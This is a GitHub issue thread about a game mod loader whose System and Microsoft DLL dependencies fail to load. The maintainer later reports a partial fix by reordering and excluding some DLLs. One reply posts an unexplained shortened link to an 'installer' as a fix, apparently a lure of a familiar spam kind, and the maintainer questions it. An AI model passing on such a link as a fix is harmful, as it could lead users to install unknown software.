### ISSUE TITLE
Some dependencies not loading

### ISSUE THREAD

**Issue by Glatrix** [Glatrix/CeLeRy#1]
**Describe the bug**
Before mods get loaded, some of the System.[...].dlls and Microsoft.[...].dlls are not loading.
Seems to differ depending on the game.

**To Reproduce**
1. Launch Game with Mod Loader Installed
2. Look at the console for the yellow text

**Expected behavior**
Everything should load.

**Screenshots**
![image](https://github.com/user-attachments/assets/c927750f-6259-4ea6-b9a2-e6695796ac1d)

**Additional context**
Might be related to one of these?
1. They are already loaded when I try to load them (dependency of another dll)
2. They have a missing dependency (and/or) the dependency has not been loaded yet.

**Comment by maher-nakesh** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by Glatrix** [comment]
> try this [link removed] select the desired compiler in the installer

msvcp140.dll? Where and why? Not much explanation in your reply.
thanks

**Comment by Glatrix** [comment]
Sort of fixed in latest release. I now sort deps by '.'s so System.dll will get loaded before System.X.dll.
Additionally, I exclude these deps:

```
"Microsoft.DiaSymReader.Native.x86.dll"
"System.IO.Compression.Native.dll"
"System.Private.CoreLib.dll"
```
